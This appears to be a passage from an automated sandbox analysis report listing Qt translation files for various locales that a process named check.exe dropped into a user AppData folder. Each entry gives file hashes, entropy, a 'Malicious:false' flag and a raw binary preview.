                                                                                                                                                                                                            Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165170
                                                                                                                                                                                                            Entropy (8bit):4.679910767547088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                            MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                            SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                            SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                            SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179941
                                                                                                                                                                                                            Entropy (8bit):4.720938209922096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                            MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                            SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                            SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                            SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166167
                                                                                                                                                                                                            Entropy (8bit):4.685212271435657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                            MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                            SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                            SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                            SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):189580
                                                                                                                                                                                                            Entropy (8bit):4.630160941635514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                            MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                            SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                            SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                            SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):138690
                                                                                                                                                                                                            Entropy (8bit):5.515748942553918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                            MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                            SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                            SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                            SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160494
                                                                                                                                                                                                            Entropy (8bit):4.831791320613137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                            MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                            SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                            SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                            SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161172
                                                                                                                                                                                                            Entropy (8bit):4.680034416311688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                            MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                            SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                            SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                            SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129911
                                                                                                                                                                                                            Entropy (8bit):5.802855391832282
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                            MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                            SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                            SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                            SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):156799
                                                                                                                                                                                                            Entropy (8bit):5.859529082176036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                            MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                            SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                            SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                            SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153608
                                                                                                                                                                                                            Entropy (8bit):4.843805801051326
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                            MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                            SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                            SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                            SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162982
                                                                                                                                                                                                            Entropy (8bit):4.841899887077422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                            MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                            SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                            SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                            SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203767
                                                                                                                                                                                                            Entropy (8bit):5.362551648909705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                            MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                            SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                            SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                            SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):125763
                                                                                                                                                                                                            Entropy (8bit):4.80343609423322
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                            MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                            SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                            SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                            SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194487
                                                                                                                                                                                                            Entropy (8bit):4.877239354585035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                            MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                            SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                            SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                            SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
